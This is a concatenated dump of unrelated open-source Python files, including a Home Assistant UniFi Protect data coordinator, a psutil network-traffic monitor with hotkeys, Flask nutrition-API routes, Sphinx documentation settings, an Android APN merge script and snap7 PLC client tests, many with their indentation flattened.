# Concatenated Python source files from a code-dataset dump (one dataset row per file).
# The dataset's per-row metadata (hexsha, size, ext, repo path/name, license,
# star/issue/fork counts and line-length statistics) has been condensed into the
# one-line file headers below; the trailing per-file statistics rows were dropped.
# ==== homeassistant/components/unifiprotect/data.py | repo: mib1185/core | license: Apache-2.0 ====
"""Base class for protect data."""
from __future__ import annotations
from collections.abc import Callable, Generator, Iterable
from datetime import timedelta
import logging
from typing import Any
from pyunifiprotect import ProtectApiClient
from pyunifiprotect.data import (
Bootstrap,
Event,
Liveview,
ModelType,
ProtectAdoptableDeviceModel,
ProtectModelWithId,
WSSubscriptionMessage,
)
from pyunifiprotect.exceptions import ClientError, NotAuthorized
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.helpers.event import async_track_time_interval
from .const import CONF_DISABLE_RTSP, DEVICES_THAT_ADOPT, DEVICES_WITH_ENTITIES, DOMAIN
from .utils import async_get_devices, async_get_devices_by_type
_LOGGER = logging.getLogger(__name__)
@callback
def async_last_update_was_successful(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Check if the last update was successful for a config entry."""
return bool(
DOMAIN in hass.data
and entry.entry_id in hass.data[DOMAIN]
and hass.data[DOMAIN][entry.entry_id].last_update_success
)
class ProtectData:
"""Coordinate updates."""
def __init__(
self,
hass: HomeAssistant,
protect: ProtectApiClient,
update_interval: timedelta,
entry: ConfigEntry,
) -> None:
"""Initialize an subscriber."""
super().__init__()
        self._hass = hass
        self._entry = entry
self._update_interval = update_interval
self._subscriptions: dict[str, list[Callable[[ProtectModelWithId], None]]] = {}
self._unsub_interval: CALLBACK_TYPE | None = None
self._unsub_websocket: CALLBACK_TYPE | None = None
self.last_update_success = False
self.api = protect
@property
def disable_stream(self) -> bool:
"""Check if RTSP is disabled."""
return self._entry.options.get(CONF_DISABLE_RTSP, False)
def get_by_types(
self, device_types: Iterable[ModelType]
) -> Generator[ProtectAdoptableDeviceModel, None, None]:
"""Get all devices matching types."""
for device_type in device_types:
yield from async_get_devices_by_type(
self.api.bootstrap, device_type
).values()
async def async_setup(self) -> None:
"""Subscribe and do the refresh."""
self._unsub_websocket = self.api.subscribe_websocket(
self._async_process_ws_message
)
await self.async_refresh()
async def async_stop(self, *args: Any) -> None:
"""Stop processing data."""
if self._unsub_websocket:
self._unsub_websocket()
self._unsub_websocket = None
if self._unsub_interval:
self._unsub_interval()
self._unsub_interval = None
await self.api.async_disconnect_ws()
async def async_refresh(self, *_: Any, force: bool = False) -> None:
"""Update the data."""
# if last update was failure, force until success
if not self.last_update_success:
force = True
try:
updates = await self.api.update(force=force)
except NotAuthorized:
await self.async_stop()
_LOGGER.exception("Reauthentication required")
self._entry.async_start_reauth(self._hass)
self.last_update_success = False
except ClientError:
if self.last_update_success:
_LOGGER.exception("Error while updating")
self.last_update_success = False
# manually trigger update to mark entities unavailable
self._async_process_updates(self.api.bootstrap)
else:
self.last_update_success = True
self._async_process_updates(updates)
@callback
def _async_process_ws_message(self, message: WSSubscriptionMessage) -> None:
# removed packets are not processed yet
if message.new_obj is None or not getattr(
message.new_obj, "is_adopted_by_us", True
):
return
if message.new_obj.model in DEVICES_WITH_ENTITIES:
self._async_signal_device_update(message.new_obj)
        # trigger updates for all cameras with LCD screens when the NVR doorbell settings update
if "doorbell_settings" in message.changed_data:
_LOGGER.debug(
"Doorbell messages updated. Updating devices with LCD screens"
)
self.api.bootstrap.nvr.update_all_messages()
for camera in self.api.bootstrap.cameras.values():
if camera.feature_flags.has_lcd_screen:
self._async_signal_device_update(camera)
# trigger updates for camera that the event references
elif isinstance(message.new_obj, Event):
if message.new_obj.camera is not None:
self._async_signal_device_update(message.new_obj.camera)
elif message.new_obj.light is not None:
self._async_signal_device_update(message.new_obj.light)
elif message.new_obj.sensor is not None:
self._async_signal_device_update(message.new_obj.sensor)
        # alert the user that a Viewport restart is needed so voice clients can get new options
elif len(self.api.bootstrap.viewers) > 0 and isinstance(
message.new_obj, Liveview
):
_LOGGER.warning(
"Liveviews updated. Restart Home Assistant to update Viewport select options"
)
@callback
def _async_process_updates(self, updates: Bootstrap | None) -> None:
"""Process update from the protect data."""
# Websocket connected, use data from it
if updates is None:
return
self._async_signal_device_update(self.api.bootstrap.nvr)
for device in async_get_devices(self.api.bootstrap, DEVICES_THAT_ADOPT):
self._async_signal_device_update(device)
@callback
def async_subscribe_device_id(
self, device_id: str, update_callback: Callable[[ProtectModelWithId], None]
) -> CALLBACK_TYPE:
"""Add an callback subscriber."""
if not self._subscriptions:
self._unsub_interval = async_track_time_interval(
self._hass, self.async_refresh, self._update_interval
)
self._subscriptions.setdefault(device_id, []).append(update_callback)
def _unsubscribe() -> None:
self.async_unsubscribe_device_id(device_id, update_callback)
return _unsubscribe
@callback
def async_unsubscribe_device_id(
self, device_id: str, update_callback: Callable[[ProtectModelWithId], None]
) -> None:
"""Remove a callback subscriber."""
self._subscriptions[device_id].remove(update_callback)
if not self._subscriptions[device_id]:
del self._subscriptions[device_id]
if not self._subscriptions and self._unsub_interval:
self._unsub_interval()
self._unsub_interval = None
@callback
def _async_signal_device_update(self, device: ProtectModelWithId) -> None:
"""Call the callbacks for a device_id."""
device_id = device.id
if not self._subscriptions.get(device_id):
return
_LOGGER.debug("Updating device: %s", device_id)
for update_callback in self._subscriptions[device_id]:
update_callback(device)
@callback
def async_ufp_instance_for_config_entry_ids(
hass: HomeAssistant, config_entry_ids: set[str]
) -> ProtectApiClient | None:
"""Find the UFP instance for the config entry ids."""
domain_data = hass.data[DOMAIN]
for config_entry_id in config_entry_ids:
if config_entry_id in domain_data:
protect_data: ProtectData = domain_data[config_entry_id]
return protect_data.api
return None
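
# --- Editor's sketch (not part of the original file) ---
# A self-contained illustration of the subscribe/unsubscribe contract that
# ProtectData implements above: the first subscriber starts the poll interval
# and the last unsubscribe stops it. The dict registry below is a stand-in
# assumption for the sketch, not Home Assistant API.
def _demo_subscription_contract():
    subscriptions = {}

    def subscribe(device_id, callback):
        if not subscriptions:
            print("first subscriber -> start interval timer")
        subscriptions.setdefault(device_id, []).append(callback)

        def unsubscribe():
            # mirror async_unsubscribe_device_id: drop the callback, then the
            # device entry, then the timer once nothing is left
            subscriptions[device_id].remove(callback)
            if not subscriptions[device_id]:
                del subscriptions[device_id]
            if not subscriptions:
                print("last subscriber gone -> stop interval timer")

        return unsubscribe

    unsub = subscribe("camera-1", lambda device: print("updated:", device))
    unsub()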
# ==== pash/actions/del_pass.py | repo: simon8889/PASH | license: MIT ====
from pash.actions.main import DbActions
class DelPass(DbActions):
def __init__(self, _id):
super().__init__()
self.id = _id
    def delete(self):
try:
self.collection.delete_one({"_id": self.id})
return True
        except Exception:
            return False
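
# --- Editor's usage sketch (not part of the original file) ---
# How DelPass is presumably driven; DbActions is assumed to provide
# `self.collection` (a MongoDB collection) and the id below is a placeholder:
#   if DelPass("5f1e0c2a").delete():
#       print("password entry removed")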
# ==== WeatherRanger/WeatherRangerProject/migrations/0003_auto_20170227_2111.py | repo: mgoldbas/WeatherRanger | license: MIT ====
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-27 21:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('WeatherRangerProject', '0002_auto_20170226_0109'),
]
operations = [
migrations.AlterField(
model_name='temperaturerange',
name='is_in_five_day_range',
field=models.NullBooleanField(),
),
migrations.AlterField(
model_name='temperaturerange',
name='is_in_range',
field=models.NullBooleanField(),
),
migrations.AlterField(
model_name='temperaturerange',
name='is_in_sixteen_day_range',
field=models.NullBooleanField(),
),
]
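
# --- Editor's note (not part of the original file) ---
# A migration like the one above is applied with Django's standard command,
# e.g.: python manage.py migrate WeatherRangerProject 0003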
# ==== tests/test_main.py | repo: znhv/winsio | license: MIT ====
from brainstorm.__main__ import main, get_stats, get_out
from brainstorm.utils.menu import MainMenu
def test_stats(capsys):
text = """ Player: None
Score : 0
"""
get_stats()
captured = capsys.readouterr()
assert captured.out == text
def test_exit():
actual = get_out()
assert actual is True
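
# --- Editor's note (not part of the original file) ---
# `capsys` is pytest's built-in captured-output fixture, so these tests are
# run with pytest rather than plain unittest, e.g.: pytest tests/test_main.py -q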
# ==== network_monitor.py | repo: Mnikley/network-traffic-monitor | license: MIT ====
import time
import psutil
from functools import partial
from pynput.keyboard import Listener, Key, KeyCode
import fire
from datetime import datetime as dt
import sys
if sys.platform == "win32":
import pygetwindow as gw
def to_mb(val, update_interval=None):
"""Convert bytes to MB with 2 decimals"""
tmp = 1
if update_interval:
tmp = 1/update_interval
return "{:0.2f}".format((val / 1024 / 1024) * tmp)
def show_stats(first_timestamp: float = None, interim_timestamp: float = None,
first_data: psutil._common.snetio = None, interim_data: psutil._common.snetio = None,
cent: int = None, text: str = None, last_data: psutil._common.snetio = None):
"""Function called when pressing esc, q, space or s"""
if text == "END STATISTICS":
_ts = first_timestamp
_data = first_data
elif text == "INTERIM STATISTICS":
_ts = interim_timestamp
_data = interim_data
time_diff = time.strftime("%H:%M:%S", time.gmtime(time.time() - _ts))
total_in = to_mb(last_data.bytes_recv - _data.bytes_recv)
total_out = to_mb(last_data.bytes_sent - _data.bytes_sent)
if text == "END STATISTICS":
print("\n" + text.center(57 + cent, "*"))
print(f"{'DURATION'.center(cent)}|{'RECEIVED [MB]'.center(24)}|{'TRANSMITTED [MB]'.center(30)}")
print("-" * (57+cent))
print(f"{time_diff.center(cent)}|{total_in.center(24)}|{total_out.center(30)}")
print("*" * (57 + cent))
elif text == "INTERIM STATISTICS":
tmp = " elapsed: " + time_diff + " | received: " + total_in + " MB | sent: " + total_out + " MB "
print("\n" + tmp.center(57 + cent, "*"))
def on_press_release(event):
"""Function for both (key down & key up) events"""
global esc_pressed, space_pressed
# check if window is active to prohibit global hotkeys (windows only)
if sys.platform == "win32":
if "network_monitor" not in gw.getActiveWindowTitle():
return
if event == Key.esc or event == KeyCode.from_char("q"):
esc_pressed = True
if event == Key.space or event == KeyCode.from_char("s"):
space_pressed = True
def run(lan_name="WiFi", update_interval=1, log=False):
"""Runs the network monitor
Parameters
----------
lan_name : string
Name of the network connection
update_interval : int or float
Update interval
log : bool
Log results to file
"""
global space_pressed
# lan objects
lo = partial(psutil.net_io_counters, pernic=True, nowrap=True)
# prohibit invalid lan names
available_objs = lo().keys()
if len(available_objs) == 0:
print("No Network adapters available.")
return
if lan_name not in available_objs:
tmp = "', '".join(available_objs)
fallback_connection = None
for f in list(available_objs):
if f.lower().startswith("eth"):
fallback_connection = f
if not fallback_connection:
fallback_connection = list(available_objs)[0]
print(f"Connection '{lan_name}' not available in: '{tmp}'. Using '{fallback_connection}' instead."
f" Use --lan_name='NAME' to change adapter manually.")
lan_name = fallback_connection
# centering variable
if update_interval < 1:
cent = 12
else:
cent = 10
print_header = True
first_data, interim_data = lo()[lan_name], lo()[lan_name]
first_timestamp, interim_timestamp = time.time(), time.time()
log_file_name = dt.now().strftime("network_traffic_%y-%m-%d_%H-%M-%S.log")
while True:
if esc_pressed:
show_stats(first_timestamp=first_timestamp, first_data=first_data,
cent=cent, text="END STATISTICS", last_data=lo()[lan_name])
break
if space_pressed:
show_stats(interim_timestamp=interim_timestamp, interim_data=interim_data,
cent=cent, text="INTERIM STATISTICS", last_data=lo()[lan_name])
interim_timestamp = time.time()
interim_data = lo()[lan_name]
space_pressed = False
# two timestamps to measure diff
ts_one = lo()[lan_name]
time.sleep(update_interval)
ts_two = lo()[lan_name]
net_in = to_mb(ts_two.bytes_recv - ts_one.bytes_recv, update_interval)
net_out = to_mb(ts_two.bytes_sent - ts_one.bytes_sent, update_interval)
if print_header:
print("NETWORK MONITOR".center(57+cent, "*"))
print(f"{'TIMESTAMP'.center(cent)}| IN [MB/s] | OUT [MB/s] | TOTAL IN [MB] | TOTAL OUT [MB]")
print("-" * (57+cent))
print_header = False
if log:
with open(log_file_name, mode="a") as f:
f.write("LOG START".center(57+cent, "*") + "\n" + "TIMESTAMP\tIN [MB/s]\tOUT [MB/s]\t"
"TOTAL IN [MB]\tTOTAL OUT [MB]\n")
if update_interval < 1:
tmp_time = dt.now().strftime("%H:%M:%S:%f")[:-4]
else:
tmp_time = time.strftime("%H:%M:%S")
# status
status = f"{tmp_time.center(cent)}| {net_in.center(9)} | {net_out.center(10)} | " \
f"{to_mb(ts_two.bytes_recv).center(13)} | {to_mb(ts_two.bytes_sent).center(14)}"
print(status, end="\r")
if log:
with open(log_file_name, mode="a") as f:
f.write(status.replace("|", "\t") + "\n")
if __name__ == "__main__":
esc_pressed = False
space_pressed = False
    # key-listener
listener = Listener(on_press=None, on_release=on_press_release)
listener.start()
# run network monitor
fire.Fire(run)
# join threads
listener.stop()
listener.join()
input("Exit with any key..")
# ==== docs/conf.py | repo: gousaiyang/python-prompt-toolkit | license: BSD-3-Clause ====
# -*- coding: utf-8 -*-
#
# prompt_toolkit documentation build configuration file, created by
# sphinx-quickstart on Thu Jul 31 14:17:08 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ["sphinx.ext.autodoc", "sphinx.ext.graphviz"]
# Add any paths that contain templates here, relative to this directory.
# templates_path = ["_templates"]
# The suffix of source filenames.
source_suffix = ".rst"
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "prompt_toolkit"
copyright = "2014-2020, Jonathan Slenders"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = "3.0.22"
# The full version, including alpha/beta/rc tags.
release = "3.0.22"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
on_rtd = os.environ.get("READTHEDOCS", None) == "True"
if on_rtd:
html_theme = "default"
else:
try:
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
except ImportError:
html_theme = "pyramid"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = "images/logo_400px.png"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = "prompt_toolkitdoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
"index",
"prompt_toolkit.tex",
"prompt_toolkit Documentation",
"Jonathan Slenders",
"manual",
),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
"index",
"prompt_toolkit",
"prompt_toolkit Documentation",
["Jonathan Slenders"],
1,
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
"index",
"prompt_toolkit",
"prompt_toolkit Documentation",
"Jonathan Slenders",
"prompt_toolkit",
"One line description of project.",
"Miscellaneous",
),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
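
# --- Editor's note (not part of the original file) ---
# With this conf.py the HTML docs are typically built from the repository root
# with, e.g.: sphinx-build -b html docs docs/_build/html
# (on Read the Docs, READTHEDOCS=True selects the 'default' theme per the
# branch near the top of this file).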
# ==== macronizer_cores/food_item_api/routes.py | repo: triethuynh2301/macronizer-project | license: MIT ====
from flask import request, jsonify, Blueprint
from flask_login import login_required
from macronizer_cores import db
from macronizer_cores.models import FoodItem
from config import CALORIES_NINJA_API_KEY
import requests
# create blueprint
food_item_api = Blueprint('food_item_api', __name__)
# SECTION - routes
@food_item_api.route("/api/food/search")
@login_required
def search_food_item():
'''
    GET /api/food/search?queryString=<query_string>
----------------------------------------------------------------
- Search for food in CaloriesNinja using query string from client
Returns
--------------
List of food items in JSON format
'''
api_url = 'https://api.calorieninjas.com/v1/nutrition?query='
query_string = request.args.get('queryString')
response = requests.get(api_url + query_string, headers={'X-Api-Key': CALORIES_NINJA_API_KEY})
if response.status_code == requests.codes.ok:
# json() returns a JSON object of the result -> return payload data to JSON
return response.json()
else:
# TODO - add error handling
print("Error:", response.status_code, response.text)
res = jsonify({"message": "Request failed"})
return res
@food_item_api.route("/api/food/delete/<int:food_id>", methods=["DELETE"])
@login_required
def delete_food_item_from_log(food_id):
'''
DELETE /api/food/delete/<int:food_id>
----------------------------------------------------------------
- Delete a food item from db using item id
Parameters
--------------
food_id: int
Id of the item to be deleted
Returns
--------------
Food item deleted in JSON format and status code 204
'''
item_to_delete = FoodItem.query.get_or_404(food_id)
try:
db.session.delete(item_to_delete)
db.session.commit()
# jsonify() turn dict into json format
res = jsonify(log=item_to_delete.serialize())
return (res, 204)
    except Exception:
res = {"message": "Server Error"}
return (res, 500)
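
# --- Editor's usage sketch (not part of the original file) ---
# Example requests against the two endpoints; the host/port and the
# login-session cookie jar are assumptions for illustration:
#   curl -b cookies.txt "http://localhost:5000/api/food/search?queryString=1%20apple"
#   curl -b cookies.txt -X DELETE "http://localhost:5000/api/food/delete/42"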
# ==== tools/custom_apns.py | repo: fusionos-next/android_vendor_fuse | license: Apache-2.0 ====
#!/usr/bin/env python
#
# Copyright (C) 2018 The LineageOS Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from xml.dom.minidom import parseString
def main(argv):
reload(sys)
sys.setdefaultencoding('utf8')
original_file = 'vendor/fuse/prebuilt/common/etc/apns-conf.xml'
if len(argv) == 3:
output_file_path = argv[1]
custom_override_file = argv[2]
else:
raise ValueError("Wrong number of arguments %s" % len(argv))
custom_apn_names = []
with open(custom_override_file, 'r') as f:
for line in f:
xmltree = parseString(line)
carrier = xmltree.getElementsByTagName('apn')[0].getAttribute('carrier')
custom_apn_names.append(carrier)
with open(original_file, 'r') as input_file:
with open(output_file_path, 'w') as output_file:
for line in input_file:
writeOriginalLine = True
for apn in custom_apn_names:
if apn in line:
with open(custom_override_file, 'r') as custom_file:
for override_line in custom_file:
if apn in override_line:
output_file.write(override_line)
writeOriginalLine = False
custom_apn_names.remove(apn)
if writeOriginalLine:
if "</apns>" in line:
if custom_apn_names:
for apn in custom_apn_names:
with open(custom_override_file, 'r') as custom_file:
for override_line in custom_file:
if apn in override_line:
output_file.write(override_line)
output_file.write(line)
if __name__ == '__main__':
main(sys.argv)
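
# --- Editor's usage sketch (not part of the original file) ---
# Invoked with an output path and an override file whose <apn carrier="..."/>
# entries replace the matching carriers from the prebuilt apns-conf.xml
# (paths below are hypothetical). Note: reload(sys)/setdefaultencoding make
# this a Python 2 script.
#   python tools/custom_apns.py out/apns-conf.xml device/custom-apns.xml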
# ==== scripts/extract_spines.py | repo: FilippoC/emnlp2017 | license: MIT ====
#!/bin/python3
import sys
import discodop.treebank
import discodop.heads
treebank_path = sys.argv[1]
headrules_path = sys.argv[2]
reader = discodop.treebank.NegraCorpusReader(treebank_path)
trees = reader.trees()
sentences = reader.sents()
headrules = discodop.heads.readheadrules(headrules_path)
def extract_spines(tree, radj=True):
node_level = {}
node_allow_r_adj = {}
node_projection = {}
for subtree in tree.subtrees(lambda n: n and not isinstance(n[0], discodop.treebank.Tree)):
subtree_save = subtree
# check if this is correct for computing the word index
#projection = tree.leaves().index(subtree[0]) + 1
projection = subtree[0] + 1
level = 0
#node_level[subtree.treeposition] = level
node_projection[subtree.treeposition] = projection
previous_label = subtree.label
while discodop.heads.ishead(subtree):
subtree = subtree.parent
if previous_label != subtree.label or not radj:
level += 1
previous_label = subtree.label
node_allow_r_adj[subtree.treeposition] = False
else:
node_allow_r_adj[subtree.treeposition] = True
node_level[subtree.treeposition] = level - 1 # minus because Carreras did not count the POS
node_projection[subtree.treeposition] = projection
previous_label = subtree.label
spines = []
for subtree in tree.subtrees(lambda n: n and not isinstance(n[0], discodop.treebank.Tree)):
p = subtree.treeposition
spine = {
"id": node_projection[p],
"pos": subtree.label,
"template": "*",
"head": 0,
"att_position": 0,
"att_type": "s"
}
previous_label = subtree.label
while discodop.heads.ishead(subtree):
subtree = subtree.parent
if subtree.treeposition == ():
break
if previous_label != subtree.label or not radj:
spine["template"] += "+" + subtree.label
previous_label = subtree.label
if subtree.parent is not None:
parent = subtree.parent
parent_p = subtree.parent.treeposition
spine["head"] = node_projection[parent_p]
spine["att_position"] = node_level[parent_p]
if radj and node_allow_r_adj[parent_p] and \
(
(subtree.right_sibling is not None and discodop.heads.ishead(subtree.right_sibling))
or
(subtree.left_sibling is not None and discodop.heads.ishead(subtree.left_sibling))
):
spine["att_type"] = "r"
spines.append(spine)
return spines
for k in trees:
discodop.heads.applyheadrules(trees[k], headrules)
for k in trees:
tree = trees[k]
sentence = sentences[k]
spines = extract_spines(tree)
spines.sort(key=lambda s: s["id"])
for spine in spines:
print("%i\t%s\t%s\t%s\t%i\t%s\t%s"%(
spine["id"],
sentence[spine["id"] - 1],
spine["pos"],
spine["template"],
spine["head"],
spine["att_position"] if spine["head"] != 0 else 0,
spine["att_type"] if spine["head"] != 0 else "s"
))
print()
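
# --- Editor's usage sketch (not part of the original file) ---
# Reads a NEGRA/export-format treebank plus discodop head rules and prints one
# tab-separated spine row per token (file names below are hypothetical):
#   python scripts/extract_spines.py corpus.export negra.headrules > spines.tsv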
# ==== test/test_client.py | repo: openarchitect/python-snap7 | license: MIT ====
import ctypes
import struct
import unittest
import logging
import time
import mock
from datetime import datetime
from subprocess import Popen
from os import path, kill
import snap7
from snap7.snap7exceptions import Snap7Exception
from snap7.snap7types import S7AreaDB, S7WLByte, S7DataItem
from snap7 import util
logging.basicConfig(level=logging.WARNING)
ip = '127.0.0.1'
tcpport = 1102
db_number = 1
rack = 1
slot = 1
class TestClient(unittest.TestCase):
@classmethod
def setUpClass(cls):
server_path = path.join(path.dirname(path.realpath(snap7.__file__)),
"bin/snap7-server.py")
cls.server_pid = Popen([server_path]).pid
time.sleep(2) # wait for server to start
@classmethod
def tearDownClass(cls):
kill(cls.server_pid, 1)
def setUp(self):
self.client = snap7.client.Client()
self.client.connect(ip, rack, slot, tcpport)
def tearDown(self):
self.client.disconnect()
self.client.destroy()
def test_db_read(self):
size = 40
start = 0
db = 1
data = bytearray(40)
self.client.db_write(db_number=db, start=start, data=data)
result = self.client.db_read(db_number=db, start=start, size=size)
self.assertEqual(data, result)
def test_db_write(self):
size = 40
data = bytearray(size)
self.client.db_write(db_number=1, start=0, data=data)
def test_db_get(self):
self.client.db_get(db_number=db_number)
def test_read_multi_vars(self):
db = 1
# build and write test values
test_value_1 = 129.5
test_bytes_1 = bytearray(struct.pack('>f', test_value_1))
self.client.db_write(db, 0, test_bytes_1)
test_value_2 = -129.5
test_bytes_2 = bytearray(struct.pack('>f', test_value_2))
self.client.db_write(db, 4, test_bytes_2)
test_value_3 = 123
test_bytes_3 = bytearray([0, 0])
util.set_int(test_bytes_3, 0, test_value_3)
self.client.db_write(db, 8, test_bytes_3)
test_values = [test_value_1, test_value_2, test_value_3]
# build up our requests
data_items = (S7DataItem * 3)()
data_items[0].Area = ctypes.c_int32(S7AreaDB)
data_items[0].WordLen = ctypes.c_int32(S7WLByte)
data_items[0].Result = ctypes.c_int32(0)
data_items[0].DBNumber = ctypes.c_int32(db)
data_items[0].Start = ctypes.c_int32(0)
data_items[0].Amount = ctypes.c_int32(4) # reading a REAL, 4 bytes
data_items[1].Area = ctypes.c_int32(S7AreaDB)
data_items[1].WordLen = ctypes.c_int32(S7WLByte)
data_items[1].Result = ctypes.c_int32(0)
data_items[1].DBNumber = ctypes.c_int32(db)
data_items[1].Start = ctypes.c_int32(4)
data_items[1].Amount = ctypes.c_int32(4) # reading a REAL, 4 bytes
data_items[2].Area = ctypes.c_int32(S7AreaDB)
data_items[2].WordLen = ctypes.c_int32(S7WLByte)
data_items[2].Result = ctypes.c_int32(0)
data_items[2].DBNumber = ctypes.c_int32(db)
data_items[2].Start = ctypes.c_int32(8)
data_items[2].Amount = ctypes.c_int32(2) # reading an INT, 2 bytes
# create buffers to receive the data
# use the Amount attribute on each item to size the buffer
for di in data_items:
# create the buffer
dataBuffer = ctypes.create_string_buffer(di.Amount)
# get a pointer to the buffer
pBuffer = ctypes.cast(ctypes.pointer(dataBuffer),
ctypes.POINTER(ctypes.c_uint8))
di.pData = pBuffer
result, data_items = self.client.read_multi_vars(data_items)
result_values = []
# function to cast bytes to match data_types[] above
byte_to_value = [util.get_real, util.get_real, util.get_int]
# unpack and test the result of each read
for i in range(0, len(data_items)):
btv = byte_to_value[i]
di = data_items[i]
value = btv(di.pData, 0)
result_values.append(value)
self.assertEqual(result_values[0], test_values[0])
self.assertEqual(result_values[1], test_values[1])
self.assertEqual(result_values[2], test_values[2])
def test_upload(self):
"""
this raises an exception due to missing authorization? maybe not
implemented in server emulator
"""
self.assertRaises(Snap7Exception, self.client.upload, db_number)
@unittest.skip("TODO: invalid block size")
def test_download(self):
data = bytearray(1024)
self.client.download(block_num=db_number, data=data)
def test_read_area(self):
area = snap7.snap7types.areas.DB
dbnumber = 1
amount = 1
start = 1
self.client.read_area(area, dbnumber, start, amount)
def test_write_area(self):
area = snap7.snap7types.areas.DB
dbnumber = 1
size = 1
start = 1
data = bytearray(size)
self.client.write_area(area, dbnumber, start, data)
def test_list_blocks(self):
blockList = self.client.list_blocks()
def test_list_blocks_of_type(self):
self.client.list_blocks_of_type('DB', 10)
self.assertRaises(Exception, self.client.list_blocks_of_type,
'NOblocktype', 10)
def test_get_block_info(self):
"""test Cli_GetAgBlockInfo"""
self.client.get_block_info('DB', 1)
